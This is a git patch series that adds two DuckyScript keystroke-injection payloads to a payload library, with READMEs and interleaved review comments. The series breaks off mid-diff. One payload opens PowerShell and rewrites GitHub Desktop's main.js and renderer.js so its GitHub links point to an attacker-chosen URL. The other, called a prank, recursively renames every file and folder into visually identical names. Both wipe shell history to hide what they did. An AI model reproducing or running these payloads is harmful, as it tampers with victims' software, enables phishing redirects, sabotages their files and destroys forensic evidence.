From 1fa6cea874f69279c5acf4661cb135223adad24e Mon Sep 17 00:00:00 2001 From: Alessandro Greco Date: Mon, 16 Sep 2024 14:30:19 +0200 Subject: [PATCH 01/15] [+] Replace Links In GithubDesktop This script replaces the hardcoded GitHub links in the `renderer.js` and `main.js` files inside the GitHub Desktop application with a custom link provided by the user. --- .../Replace_Links_In_GithubDesktop/README.md | 67 +++++++++++ .../payload.txt | 109 ++++++++++++++++++ 2 files changed, 176 insertions(+) create mode 100644 payloads/library/execution/Replace_Links_In_GithubDesktop/README.md create mode 100644 payloads/library/execution/Replace_Links_In_GithubDesktop/payload.txt diff --git a/payloads/library/execution/Replace_Links_In_GithubDesktop/README.md b/payloads/library/execution/Replace_Links_In_GithubDesktop/README.md new file mode 100644 index 0000000..cf9aaa8 --- /dev/null +++ b/payloads/library/execution/Replace_Links_In_GithubDesktop/README.md 
@@ -0,0 +1,67 @@ +# Replace Links In GithubDesktop + +This script is written in **DuckyScript** and is designed to modify links in the GitHub Desktop application on Windows 10/11 systems. It automates the replacement of GitHub URLs with a custom URL defined by the user. + +## Table of Contents + +- [Features](#features) +- [Prerequisites](#prerequisites) +- [Usage](#usage) +- [Credits](#credits) + +## Features + +This script replaces the hardcoded GitHub links in the `renderer.js` and `main.js` files inside the GitHub Desktop application with a custom link provided by the user. It does the following: + +1. Detects the installation folder of GitHub Desktop. +2. Identifies the latest installed version of GitHub Desktop. It may happen that there are multiple versions on the computer but it is always the most recent one that is used, I would suggest to Github Desktop developers to remove old versions that unnecessarily burden a computer. +3. Replaces any occurrences of GitHub URLs in the `renderer.js` and `main.js` files with a new link defined by the user. + +The script uses **PowerShell** to perform this replacement after detecting the operating system and target files. + +## Prerequisites + +- **Windows 10/11** +- **GitHub Desktop** installed on the machine. + +## Usage + +1. **Modify the script**: + - Define the new URL to replace the original GitHub link by modifying the `#NEW_LINK` variable in the script: + ```duckyscript + DEFINE #NEW_LINK example.com + ``` + +2. **Customization**: + - Ensure that the path to GitHub Desktop is correct. If GitHub Desktop is installed in a non-default location, modify the `#SUBDIRECTORY` variable accordingly: + ```ducky + DEFINE #SUBDIRECTORY \AppData\Local\GitHubDesktop + ``` + +3. **Execution**: + - Upon execution, the script will: + - Open PowerShell. + - Detect the GitHub Desktop installation directory. + - Replace all GitHub URLs in the `renderer.js` and `main.js` files with the new URL you specified. + +## Credits + +

Aleff :octocat:

+
+ + + + + +
+ + + +
Github +
+ + + +
Linkedin +
+
\ No newline at end of file diff --git a/payloads/library/execution/Replace_Links_In_GithubDesktop/payload.txt b/payloads/library/execution/Replace_Links_In_GithubDesktop/payload.txt new file mode 100644 index 0000000..baf34d5 --- /dev/null +++ b/payloads/library/execution/Replace_Links_In_GithubDesktop/payload.txt 
@@ -0,0 +1,109 @@ +REM_BLOCK +##################################################### +# # +# Title : Replace Links In GithubDesktop # +# Author : Aleff # +# Version : 1.0 # +# Category : Execution # +# Target : Windows 10/11 # +# # +##################################################### +END_REM + + +REM REQUIRED - Define here the new url that will replace the original github link +DEFINE #NEW_LINK example.com + +REM DON'T CHANGE - This variable is a constant in this case, change it only if you are sure that the path to GithubDesktop is not the default +DEFINE #SUBDIRECTORY \AppData\Local\GitHubDesktop + + +REM_BLOCK + Credits: Hak5 LLC + Website: https://hak5.org/ + Source: https://github.com/hak5/usbrubberducky-payloads/blob/master/payloads/extensions/passive_windows_detect.txt +END_REM + +EXTENSION PASSIVE_WINDOWS_DETECT + REM VERSION 1.1 + REM AUTHOR: Korben + + REM_BLOCK DOCUMENTATION + Windows fully passive OS Detection and passive Detect Ready + Includes its own passive detect ready. + Does not require additional extensions. + + USAGE: + Extension runs inline (here) + Place at beginning of payload (besides ATTACKMODE) to act as dynamic + boot delay + $_OS will be set to WINDOWS or NOT_WINDOWS + See end of payload for usage within payload + END_REM + + REM CONFIGURATION: + DEFINE #MAX_WAIT 150 + DEFINE #CHECK_INTERVAL 20 + DEFINE #WINDOWS_HOST_REQUEST_COUNT 2 + DEFINE #NOT_WINDOWS 7 + + $_OS = #NOT_WINDOWS + + VAR $MAX_TRIES = #MAX_WAIT + WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0)) + DELAY #CHECK_INTERVAL + $MAX_TRIES = ($MAX_TRIES - 1) + END_WHILE + IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN + $_OS = WINDOWS + END_IF + + REM_BLOCK EXAMPLE USAGE AFTER EXTENSION + IF ($_OS == WINDOWS) THEN + STRING HELLO WINDOWS! + ELSE + STRING HELLO WORLD! 
+ END_IF + END_REM +END_EXTENSION + + +GUI r +DELAY 1000 +STRINGLN PowerShell +DELAY 1000 + +STRINGLN + $path = Join-Path -Path $env:USERPROFILE -ChildPath "#SUBDIRECTORY" + + $folders = Get-ChildItem -Path $path -Directory | Where-Object { $_.Name -like "app-*" } + + $versions = $folders | ForEach-Object { + [PSCustomObject]@{ + FolderName = $_.Name + Version = [version]($_.Name -replace "app-", "") + } + } + + $latestVersionFolder = $versions | Sort-Object Version -Descending | Select-Object -First 1 + + $latestFolderPath = Join-Path -Path $path -ChildPath $latestVersionFolder.FolderName + $latestFolderPath += "\resources\app\" + $renderer = "renderer.js" + $main = "main.js" + + $filePath = "$latestFolderPath$renderer" + + $fileContent = Get-Content $filePath + $regex = [regex]'"(https:\/\/[\w\d\.\/\-]*github[\w\d\.\/\-]+)"' + $modifiedContent = $fileContent -replace $regex, '#NEW_LINK' + Set-Content -Path $filePath -Value $modifiedContent + + + $filePath = "$latestFolderPath$main" + $fileContent = Get-Content $filePath + $regex = [regex]'openExternal\("(https:\/\/[\w\d\.\/\-]*github[\w\d\.\/\-]+)"\)' + $modifiedContent = $fileContent -replace $regex, ('openExternal("#NEW_LINK")') + Set-Content -Path $filePath -Value $modifiedContent; Remove-Item (Get-PSReadlineOption).HistorySavePath; exit + +END_STRINGLN \ No newline at end of file From 71d5eaf37807c03f35ba2f7d57b491444799d119 Mon Sep 17 00:00:00 2001 From: Aleff Date: Mon, 16 Sep 2024 14:42:11 +0200 Subject: [PATCH 02/15] Bug in renderer regex the link api.github.com needs to be correct --- .../execution/Replace_Links_In_GithubDesktop/payload.txt | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/payloads/library/execution/Replace_Links_In_GithubDesktop/payload.txt b/payloads/library/execution/Replace_Links_In_GithubDesktop/payload.txt index baf34d5..097750f 100644 --- a/payloads/library/execution/Replace_Links_In_GithubDesktop/payload.txt 
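Review bot: The renderer pattern `$regex = [regex]'"(https:\/\/[\w\d\.\/\-]*github[\w\d\.\/\-]+)"'` consumes the surrounding double quotes while its replacement `'#NEW_LINK'` supplies none, so each rewritten string literal in renderer.js loses its delimiters; the main.js branch is consistent only because its replacement `('openExternal("#NEW_LINK")')` writes them back. Either leave the quotes out of the pattern or use `'"#NEW_LINK"'` as the replacement. `#NEW_LINK` is also spliced into a `-replace` substitution string, where `$` introduces a group reference, so the header REM block should state that the value must be a bare host or path without `$`. The `Get-Content`/`Set-Content` pair reads the file line by line and writes it back with the shell's default encoding and a trailing newline, which deserves a comment since the target is a source file the application parses.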
+++ b/payloads/library/execution/Replace_Links_In_GithubDesktop/payload.txt
@@ -95,7 +95,7 @@ STRINGLN
 $filePath = "$latestFolderPath$renderer"
 $fileContent = Get-Content $filePath
- $regex = [regex]'"(https:\/\/[\w\d\.\/\-]*github[\w\d\.\/\-]+)"'
+ $regex = [regex]'(https:\/\/(?![\w\d\.\/\-]*api)[\w\d\.\/\-]*github[\w\d\.\/\-]+)'
 $modifiedContent = $fileContent -replace $regex, '#NEW_LINK'
 Set-Content -Path $filePath -Value $modifiedContent
@@ -106,4 +106,4 @@ STRINGLN
 $modifiedContent = $fileContent -replace $regex, ('openExternal("#NEW_LINK")')
 Set-Content -Path $filePath -Value $modifiedContent; Remove-Item (Get-PSReadlineOption).HistorySavePath; exit
-END_STRINGLN
\ No newline at end of file
+END_STRINGLN
From 6e3f5924c02c008718beabe31e375113d68c0196 Mon Sep 17 00:00:00 2001
From: Alessandro Greco
Date: Mon, 16 Sep 2024 14:43:00 +0200
Subject: [PATCH 03/15] Update payload.txt
---
 .../execution/Replace_Links_In_GithubDesktop/payload.txt | 3 ++-
 1 file changed, 2 insertions(+), 1 deletion(-)
diff --git a/payloads/library/execution/Replace_Links_In_GithubDesktop/payload.txt b/payloads/library/execution/Replace_Links_In_GithubDesktop/payload.txt
index baf34d5..a76977e 100644
--- a/payloads/library/execution/Replace_Links_In_GithubDesktop/payload.txt
+++ b/payloads/library/execution/Replace_Links_In_GithubDesktop/payload.txt
@@ -95,7 +95,8 @@ STRINGLN
 $filePath = "$latestFolderPath$renderer"
 $fileContent = Get-Content $filePath
- $regex = [regex]'"(https:\/\/[\w\d\.\/\-]*github[\w\d\.\/\-]+)"'
+ $regex = [regex]'(https:\/\/(?![\w\d\.\/\-]*api)[\w\d\.\/\-]*github[\w\d\.\/\-]+)
+'
 $modifiedContent = $fileContent -replace $regex, '#NEW_LINK'
 Set-Content -Path $filePath -Value $modifiedContent
From b1fae99adebfc5988ea1a981182ad1169f6e2e8c Mon Sep 17 00:00:00 2001
From: Alessandro Greco
Date: Mon, 16 Sep 2024 14:54:17 +0200
Subject: [PATCH 04/15] Update README.md
---
 .../library/execution/Replace_Links_In_GithubDesktop/README.md | 2 ++
 1 file changed, 2 insertions(+)
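Review bot: The lookahead `(?![\w\d\.\/\-]*api)` in the new `$regex` line rejects any URL whose text before `github` contains `api` anywhere, not only the `api.github.com` host the commit message describes, so a host or path segment that merely contains those three letters is skipped as well; `(?!api\.)` placed directly after `https:\/\/` is closer to the stated intent. `\d` inside `[\w\d\.\/\-]` is redundant because `\w` already matches digits, and `/` does not need escaping in a .NET pattern. The hunk also drops the surrounding `"` from the pattern so the literal's delimiters now survive the replacement; that is a second fix and deserves a mention in the commit message.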
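Review bot: The single-quoted pattern on the `+ $regex = [regex]'(https:\/\/...]+)` line is not closed on that line; the closing `'` sits on the following added line, so the literal now ends with a newline before the closing quote and the pattern only matches a URL followed by a line break, which the per-line output of `Get-Content` never contains. Keep the whole literal on one line as the previous commit does. This patch is also based on the same parent as the previous one (`index baf34d5..a76977e` versus `baf34d5..097750f`) and touches the same line, so applying the series in order will conflict.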
diff --git a/payloads/library/execution/Replace_Links_In_GithubDesktop/README.md b/payloads/library/execution/Replace_Links_In_GithubDesktop/README.md index cf9aaa8..2595875 100644 --- a/payloads/library/execution/Replace_Links_In_GithubDesktop/README.md +++ b/payloads/library/execution/Replace_Links_In_GithubDesktop/README.md @@ -2,6 +2,8 @@ This script is written in **DuckyScript** and is designed to modify links in the GitHub Desktop application on Windows 10/11 systems. It automates the replacement of GitHub URLs with a custom URL defined by the user. +![](https://github.com/aleff-github/Deposito/blob/main/Replace_Links_In_GithubDesktop/GithubDesktop.gif?raw=true) + ## Table of Contents - [Features](#features) From d3e494fd12a896f5100b805109fb78e43d122a13 Mon Sep 17 00:00:00 2001 
From: Aleff Date: Wed, 18 Sep 2024 19:21:22 +0200 Subject: [PATCH 05/15] Rename Everything Similarly This script, titled **Rename Everything Similarly**, is written in **DuckyScript 3.0** and designed to rename files and directories recursively on **Windows** or **Linux** systems, depending on the target environment. The script renames directories and files within a specified directory, giving them sequential and similar names. Specifically, the ability to add a blank space to the end of the name is used. On Windows systems, if file extension viewing is not enabled the names will look identical to the human eye, while on GNU/Linux systems the difference may be more easily noticed. ![No extensions](https://github.com/aleff-github/Deposito/blob/main/Rename_Everything_Similarly/1.png?raw=true) > How does renaming files using spaces without seeing the extension appear on windows. - To the human eye they look identical. ![With extensions](https://github.com/aleff-github/Deposito/blob/main/Rename_Everything_Similarly/2.png?raw=true) > What it looks like instead if you turn on the extension view. --- .../Rename_Everything_Similarly/README.md | 116 +++++++++ .../Rename_Everything_Similarly/payload.txt | 220 ++++++++++++++++++ 2 files changed, 336 insertions(+) create mode 100644 payloads/library/prank/Rename_Everything_Similarly/README.md create mode 100644 payloads/library/prank/Rename_Everything_Similarly/payload.txt diff --git a/payloads/library/prank/Rename_Everything_Similarly/README.md b/payloads/library/prank/Rename_Everything_Similarly/README.md new file mode 100644 index 0000000..4bf4701 --- /dev/null +++ b/payloads/library/prank/Rename_Everything_Similarly/README.md 
@@ -0,0 +1,116 @@ +# Rename Everything Similarly + +This script, titled **Rename Everything Similarly**, is written in **DuckyScript 3.0** and designed to rename files and directories recursively on **Windows** or **Linux** systems, depending on the target environment. The script renames directories and files within a specified directory, giving them sequential and similar names. + +Specifically, the ability to add a blank space to the end of the name is used. On Windows systems, if file extension viewing is not enabled the names will look identical to the human eye, while on GNU/Linux systems the difference may be more easily noticed. + +![No extensions](https://github.com/aleff-github/Deposito/blob/main/Rename_Everything_Similarly/1.png?raw=true) + +> How does renaming files using spaces without seeing the extension appear on windows. - To the human eye they look identical. + +![With extensions](https://github.com/aleff-github/Deposito/blob/main/Rename_Everything_Similarly/2.png?raw=true) + +> What it looks like instead if you turn on the extension view. + +# Index + +1. [Features](#features) +2. [Payload Structure](#payload-structure) + - [Conditional Target OS Execution](#conditional-target-os-execution) + - [PowerShell (Windows)](#powershell-windows) + - [Bash (GNU/Linux)](#bash-gnulinux) +3. [How to Use](#how-to-use) +4. [Why not MacOS?](#why-not-macos) +5. [Notes](#notes) +6. [Credits](#credits) + + +## Features +- **Cross-platform support**: The script can be executed on either **Windows** or **GNU/Linux** systems, based on the defined conditions, unfortunately it could not be published for macOS as well, [read more](#why-not-macos). +- **Recursive renaming**: It renames all directories and files inside a given directory, iterating through subdirectories. +- **Customizable**: Users can modify the base directory path and rename pattern as needed. 
+ +## Payload Structure + +### Conditional Target OS Execution +The script detects (*from the DEFINE*) the target OS and adapts to either **Windows** or **GNU/Linux**: +- If the target system is **Windows**, the script will execute a PowerShell script. +- If the target system is **Linux**, it will execute a Bash script. + +### PowerShell (Windows) +For **Windows** systems, the script: +- Opens **PowerShell** and runs the `Rename-Directories` and `Rename-Files` functions. +- It renames directories by assigning sequential names like `d`, `dd`, etc., and files with names like `a`, `a `, `a `, followed by their respective file extensions. + +### Bash (GNU/Linux) +For **GNU/Linux** systems, the script: +- Opens a terminal and executes two Bash functions: `rename_directories` and `rename_files`. +- It performs similar renaming of directories and files, using `mv` to rename them with sequential names (like `d`, `dd`, etc... or `a`, `a `, `a ` etc...). + +## How to Use + +1. **Edit Definitions (*not mandatory, Windows by default*)**: Adjust the following definitions in the script according to your environment: + - `#TRUE_IF_THE_TARGET_IS_WINDOWS_ELSE_FALSE`: Leave `TRUE` for **Windows** targets and change to `FALSE` for **GNU/Linux** targets. + + Ufortunately it could not be published for macOS as well, [read more](#why-not-macos). + + - `#DIRECTORY_WHERE_TO_RUN_THE_COMMAND`: Specify the base directory where the renaming operation should occur, the default is `.` so the default route of Powershell and Bash. + + Consider that the main route for Windows generally is `C:\Users\Username\` while for GNU/Linux systems it is something like `/home/username/` but in both cases if for istance you add `./Desktop/Hello/World/` you will go to the World folder in the path `C:\Users\Username\Desktop\Hello\World\` for Windows systems and `/home/username/Desktop/Hello/World/`. + + Of course, you have to make sure that this folder exists.... 
+ + ![Windows command](https://github.com/aleff-github/Deposito/blob/main/Rename_Everything_Similarly/3.png?raw=true) + + > How Windows response to the command `cd ./Desktop/Hello/World/` + + ![Ubuntu command](https://github.com/aleff-github/Deposito/blob/main/Rename_Everything_Similarly/4.png?raw=true) + + > How Ubuntu response to the command `cd ./Desktop/Hello/World/` + + Consider the maximum length of file names on both Windows and GNU/Linux: + + - [Limit on file name length in bash \[closed\]](https://stackoverflow.com/questions/6571435/limit-on-file-name-length-in-bash) + + |=> https://stackoverflow.com/questions/6571435/limit-on-file-name-length-in-bash + + - [On Windows, what is the maximum file name length considered acceptable for an app to output? (Updated and clarified)](https://stackoverflow.com/questions/8674796/on-windows-what-is-the-maximum-file-name-length-considered-acceptable-for-an-ap) + + |=> https://stackoverflow.com/questions/8674796/on-windows-what-is-the-maximum-file-name-length-considered-acceptable-for-an-ap + +2. **Load Payload**: Upload the script to a USB Rubber Ducky device using the **DuckEncoder**. + +3. **Execute Payload**: Insert the USB Rubber Ducky into the target machine. + +## Why not MacOS? + +I am very sorry not to be able to release scripts for macOS systems as well but unfortunately not having one would be too risky to test it in a VM, at least in my opinion, so if someone from the community wants to contribute they could propose a pull request with the macOS version so that we can integrate it and make this payload cross-platfom. + +If I could know the behavior of this script on macOS (*which probably remains completely unchanged from use on GNU/Linux systems*) it could be optimized in that it could be reduced to a **WINDOWS_PASSIVE_DETECT** where if it is not Windows (*so generally GNU/Linux or macOS systems*) the bash script may be fine. + +## Notes +- Ensure that the specified directories exist on the target machine. 
+- Use with caution on sensitive systems, as the renaming process is recursive and may affect large directories. +- Contributions to add support for macOS are welcome. + +## Credits + +

Aleff :octocat:

+
+ + + + + +
+ + + +
Github +
+ + + +
Linkedin +
+
\ No newline at end of file diff --git a/payloads/library/prank/Rename_Everything_Similarly/payload.txt b/payloads/library/prank/Rename_Everything_Similarly/payload.txt new file mode 100644 index 0000000..8e05803 --- /dev/null +++ b/payloads/library/prank/Rename_Everything_Similarly/payload.txt 
@@ -0,0 +1,220 @@ +REM_BLOCK +################################################# +# # +# Title : Rename Everything Similarly # +# Author : Aleff # +# Version : 1.0 # +# Category : Prank # +# Target : Windows 10 # +# # +################################################# +END_REM + +REM %%%%% DEFINE-SECTION %%%%% +DEFINE #DIRECTORY_WHERE_TO_RUN_THE_COMMAND . + +REM I am very sorry not to be able to release scripts for macOS systems as well but unfortunately not having one would be too risky to test it in a VM, at least in my opinion, so if someone from the community wants to contribute they could propose a pull request with the macOS version so that we can integrate it and make this payload cross-platfom. + +REM leave it TRUE if you want to run this script into a target that use Windows as OS, else if you want to run this script into a GNU/Linux system you must change it to FALSE. +DEFINE #TRUE_IF_THE_TARGET_IS_WINDOWS_ELSE_FALSE TRUE + +REM_BLOCK + + Consider that the main route for Windows generally is “C:\Users\Username\” while for GNU/Linux systems it is something like “/home/username/” but in both cases if for example you add “./Desktop/Hello/World/” you will go to the World folder in the path “C:\Users\Username\Desktop\Hello\World\” for Windows systems and “/home/username/Desktop/Hello/World/” for **GNU/Linux** systems. + + Of course, you have to make sure that this folder exists.... + + Payload Settings: + #DIRECTORY_WHERE_TO_RUN_THE_COMMAND - If you feel it is appropriate to run this script within a specific folder you will just need to change this definition. + + Consider the maximum length of file names on both Windows and GNU/Linux: + - Limit on file name length in bash [closed] + |-> https://stackoverflow.com/questions/6571435/limit-on-file-name-length-in-bash + - On Windows, what is the maximum file name length considered acceptable for an app to output? 
(Updated and clarified) + |-> https://stackoverflow.com/questions/8674796/on-windows-what-is-the-maximum-file-name-length-considered-acceptable-for-an-ap + +END_REM + +REM %%%%% PAYLOAD-SECTION %%%%% + +IF_DEFINED_TRUE #TRUE_IF_THE_TARGET_IS_WINDOWS_ELSE_FALSE + + REM_BLOCK + Credits: Hak5 LLC + Website: https://hak5.org/ + Source: https://github.com/hak5/usbrubberducky-payloads/blob/master/payloads/extensions/passive_windows_detect.txt + END_REM + + EXTENSION PASSIVE_WINDOWS_DETECT + REM VERSION 1.1 + REM AUTHOR: Korben + + REM_BLOCK DOCUMENTATION + Windows fully passive OS Detection and passive Detect Ready + Includes its own passive detect ready. + Does not require additional extensions. + + USAGE: + Extension runs inline (here) + Place at beginning of payload (besides ATTACKMODE) to act as dynamic + boot delay + $_OS will be set to WINDOWS or NOT_WINDOWS + See end of payload for usage within payload + END_REM + + REM CONFIGURATION: + DEFINE #MAX_WAIT 150 + DEFINE #CHECK_INTERVAL 20 + DEFINE #WINDOWS_HOST_REQUEST_COUNT 2 + DEFINE #NOT_WINDOWS 7 + + $_OS = #NOT_WINDOWS + + VAR $MAX_TRIES = #MAX_WAIT + WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0)) + DELAY #CHECK_INTERVAL + $MAX_TRIES = ($MAX_TRIES - 1) + END_WHILE + IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN + $_OS = WINDOWS + END_IF + + REM_BLOCK EXAMPLE USAGE AFTER EXTENSION + IF ($_OS == WINDOWS) THEN + STRING HELLO WINDOWS! + ELSE + STRING HELLO WORLD! 
+ END_IF + END_REM + END_EXTENSION + + GUI r + DELAY 1000 + STRINGLN PowerShell + DELAY 1000 + + STRINGLN_POWERSHELL + cd #DIRECTORY_WHERE_TO_RUN_THE_COMMAND + + function Rename-Directories { + param ( + [string]$path, + [ref]$counter + ) + + $folders = Get-ChildItem -Path $path -Directory -Recurse | Sort-Object FullName -Descending + foreach ($folder in $folders) { + $newFolderName = "d" * $counter.Value # Crea il nuovo nome della cartella + $newFolderPath = $newFolderName + + $counter.Value++ + + Rename-Item -Path $folder.FullName -NewName $newFolderPath + Write-Host "Rinominata cartella: $($folder.FullName) -> $($newFolderPath)" + } + } + + function Rename-Files { + param ( + [string]$path, + [ref]$counter + ) + $files = Get-ChildItem -Path $path -File -Recurse + foreach ($file in $files) { + $newFileName = "a" + " " * $counter.Value # Crea il nuovo nome del file + $newFilePath = "$newFileName" + $file.Extension + + $counter.Value++ + + Rename-Item -Path $file.FullName -NewName $newFilePath + Write-Host "Rinominato file: $($file.FullName) -> $($newFilePath)" + } + } + + $counter = 1; Rename-Directories -path $basePath -counter ([ref]$counter); $counter = 1; Rename-Files -path $basePath -counter ([ref]$counter); Remove-Item (Get-PSReadlineOption).HistorySavePath; exit + END_STRINGLN + +ELSE_DEFINED + + REM_BLOCK + Credits: Hak5 LLC + Website: https://hak5.org/ + Source: https://github.com/hak5/usbrubberducky-payloads/blob/master/payloads/extensions/detect_ready.txt + END_REM + + EXTENSION DETECT_READY + REM VERSION 1.1 + REM AUTHOR: Korben + + REM_BLOCK DOCUMENTATION + USAGE: + Extension runs inline (here) + Place at beginning of payload (besides ATTACKMODE) to act as dynamic + boot delay + + TARGETS: + Any system that reflects CAPSLOCK will detect minimum required delay + Any system that does not reflect CAPSLOCK will hit the max delay of 3000ms + END_REM + + REM CONFIGURATION: + DEFINE #RESPONSE_DELAY 25 + DEFINE #ITERATION_LIMIT 120 + + VAR $C = 0 + WHILE 
(($_CAPSLOCK_ON == FALSE) && ($C < #ITERATION_LIMIT)) + CAPSLOCK + DELAY #RESPONSE_DELAY + $C = ($C + 1) + END_WHILE + CAPSLOCK + END_EXTENSION + + CTRL-ALT t + DELAY 1000 + + STRINGLN_BASH + cd #DIRECTORY_WHERE_TO_RUN_THE_COMMAND + + rename_directories() { + local path=$1 + local counter=$2 + + directories=$(find "$path" -type d | sort -r) + + for dir in $directories; do + new_folder_name=$(printf 'd%.0s' $(seq 1 "$counter")) # Crea il nuovo nome della cartella + new_folder_path="$path/$new_folder_name" + + counter=$((counter + 1)) + + mv "$dir" "$new_folder_path" + done + } + + rename_files() { + local path=$1 + local counter=$2 + + files=$(find "$path" -type f) + + for file in $files; do + extension="${file##*.}" + + new_file_name="a$(printf ' %.0s' $(seq 1 "$counter"))" + + new_file_path="$(dirname "$file")/$new_file_name" + + if [[ "$extension" != "$file" ]]; then + new_file_path="$new_file_path.$extension" + fi + + counter=$((counter + 1)) + + mv "$file" "$new_file_path" + done + } + + counter=1; rename_directories "$base_path" $counter; counter=1; rename_files "$base_path" $counter; rm $HISTFILE; exit + END_STRINGLN +END_IF_DEFINED \ No newline at end of file From 9c4257edbd7b2b678a7bfba32ef6bc43032e55f3 Mon Sep 17 00:00:00 2001 From: Aleff Date: Wed, 18 Sep 2024 19:22:27 +0200 Subject: [PATCH 06/15] Update README.md --- payloads/library/prank/Rename_Everything_Similarly/README.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/payloads/library/prank/Rename_Everything_Similarly/README.md b/payloads/library/prank/Rename_Everything_Similarly/README.md index 4bf4701..894892b 100644 --- a/payloads/library/prank/Rename_Everything_Similarly/README.md +++ b/payloads/library/prank/Rename_Everything_Similarly/README.md 
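Review bot: `$basePath` in `Rename-Directories -path $basePath -counter ([ref]$counter)` and `$base_path` in `rename_directories "$base_path" $counter` are never assigned in either branch; the only directory selection is the preceding `cd #DIRECTORY_WHERE_TO_RUN_THE_COMMAND`, so both calls pass an empty path and `Get-ChildItem`/`find` fail before anything is renamed. Pass `.` in both places, or assign the variable right after the `cd`. In the Bash branch, `for dir in $directories` and `for file in $files` word-split the `find` output, so any name containing whitespace — which `new_file_name="a$(printf ' %.0s' ...)"` itself produces — is broken into several tokens; a `while IFS= read -r -d '' f` loop over `find … -print0` is the safe form. `find "$path" -type d` also lists `$path` itself, so one iteration attempts to rename the working directory.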
@@ -1,6 +1,6 @@
 # Rename Everything Similarly
-This script, titled **Rename Everything Similarly**, is written in **DuckyScript 3.0** and designed to rename files and directories recursively on **Windows** or **Linux** systems, depending on the target environment. The script renames directories and files within a specified directory, giving them sequential and similar names.
+This script, titled **Rename Everything Similarly**, is written in **DuckyScript 3.0** and designed to rename files and directories recursively on **Windows** or **GNU/Linux** systems, depending on the target environment. The script renames directories and files within a specified directory, giving them sequential and similar names.
 Specifically, the ability to add a blank space to the end of the name is used. On Windows systems, if file extension viewing is not enabled the names will look identical to the human eye, while on GNU/Linux systems the difference may be more easily noticed.
From bb89731ae269e8093967cc888ccd33ca2b9735bf Mon Sep 17 00:00:00 2001
From: Aleff
Date: Wed, 18 Sep 2024 19:27:12 +0200
Subject: [PATCH 07/15] Update payload.txt
---
 .../library/prank/Rename_Everything_Similarly/payload.txt | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)
diff --git a/payloads/library/prank/Rename_Everything_Similarly/payload.txt b/payloads/library/prank/Rename_Everything_Similarly/payload.txt
index 8e05803..b3b3114 100644
--- a/payloads/library/prank/Rename_Everything_Similarly/payload.txt
+++ b/payloads/library/prank/Rename_Everything_Similarly/payload.txt
@@ -5,7 +5,7 @@ REM_BLOCK
 # Author : Aleff #
 # Version : 1.0 #
 # Category : Prank #
-# Target : Windows 10 #
+# Target : Windows 10/11; GNU/Linux #
 # #
 #################################################
 END_REM
@@ -217,4 +217,4 @@ ELSE_DEFINED
 counter=1; rename_directories "$base_path" $counter; counter=1; rename_files "$base_path" $counter; rm $HISTFILE; exit
 END_STRINGLN
-END_IF_DEFINED
\ No newline at end of file
+END_IF_DEFINED
From f031b928a85abeccbdec619a5bbd98a17b9fec3d Mon Sep 17 00:00:00 2001 From: Aleff Date: Wed, 18 Sep 2024 19:28:22 +0200 Subject: [PATCH 08/15] Simple shifts in comments --- .../prank/Rename_Everything_Similarly/payload.txt | 11 +++++------ 1 file changed, 5 insertions(+), 6 deletions(-) diff --git a/payloads/library/prank/Rename_Everything_Similarly/payload.txt b/payloads/library/prank/Rename_Everything_Similarly/payload.txt index b3b3114..fae58e9 100644 --- a/payloads/library/prank/Rename_Everything_Similarly/payload.txt +++ b/payloads/library/prank/Rename_Everything_Similarly/payload.txt @@ -10,14 +10,9 @@ REM_BLOCK ################################################# END_REM -REM %%%%% DEFINE-SECTION %%%%% -DEFINE #DIRECTORY_WHERE_TO_RUN_THE_COMMAND . - REM I am very sorry not to be able to release scripts for macOS systems as well but unfortunately not having one would be too risky to test it in a VM, at least in my opinion, so if someone from the community wants to contribute they could propose a pull request with the macOS version so that we can integrate it and make this payload cross-platfom. -REM leave it TRUE if you want to run this script into a target that use Windows as OS, else if you want to run this script into a GNU/Linux system you must change it to FALSE. -DEFINE #TRUE_IF_THE_TARGET_IS_WINDOWS_ELSE_FALSE TRUE - +REM %%%%% DEFINE-SECTION %%%%% REM_BLOCK Consider that the main route for Windows generally is “C:\Users\Username\” while for GNU/Linux systems it is something like “/home/username/” but in both cases if for example you add “./Desktop/Hello/World/” you will go to the World folder in the path “C:\Users\Username\Desktop\Hello\World\” for Windows systems and “/home/username/Desktop/Hello/World/” for **GNU/Linux** systems. 
@@ -34,6 +29,10 @@ REM_BLOCK |-> https://stackoverflow.com/questions/8674796/on-windows-what-is-the-maximum-file-name-length-considered-acceptable-for-an-ap END_REM +DEFINE #DIRECTORY_WHERE_TO_RUN_THE_COMMAND . + +REM leave it TRUE if you want to run this script into a target that use Windows as OS, else if you want to run this script into a GNU/Linux system you must change it to FALSE. +DEFINE #TRUE_IF_THE_TARGET_IS_WINDOWS_ELSE_FALSE TRUE REM %%%%% PAYLOAD-SECTION %%%%% From d934d9d4dec3ea04a36b1379eb086dbee6e350da Mon Sep 17 00:00:00 2001 From: Aleff Date: Wed, 18 Sep 2024 19:31:24 +0200 Subject: [PATCH 09/15] removed a debug print --- payloads/library/prank/Rename_Everything_Similarly/payload.txt | 1 - 1 file changed, 1 deletion(-) diff --git a/payloads/library/prank/Rename_Everything_Similarly/payload.txt b/payloads/library/prank/Rename_Everything_Similarly/payload.txt index fae58e9..5a2c70e 100644 --- a/payloads/library/prank/Rename_Everything_Similarly/payload.txt +++ b/payloads/library/prank/Rename_Everything_Similarly/payload.txt @@ -126,7 +126,6 @@ IF_DEFINED_TRUE #TRUE_IF_THE_TARGET_IS_WINDOWS_ELSE_FALSE $counter.Value++ Rename-Item -Path $file.FullName -NewName $newFilePath - Write-Host "Rinominato file: $($file.FullName) -> $($newFilePath)" } } From 9f1222ba0534ad94703c9a65704ce00d05f616ac Mon Sep 17 00:00:00 2001 From: Aleff Date: Thu, 19 Sep 2024 19:55:47 +0200 Subject: [PATCH 10/15] Update payload.txt --- .../execution/Replace_Links_In_GithubDesktop/payload.txt | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/payloads/library/execution/Replace_Links_In_GithubDesktop/payload.txt b/payloads/library/execution/Replace_Links_In_GithubDesktop/payload.txt index 097750f..fa98a6c 100644 --- 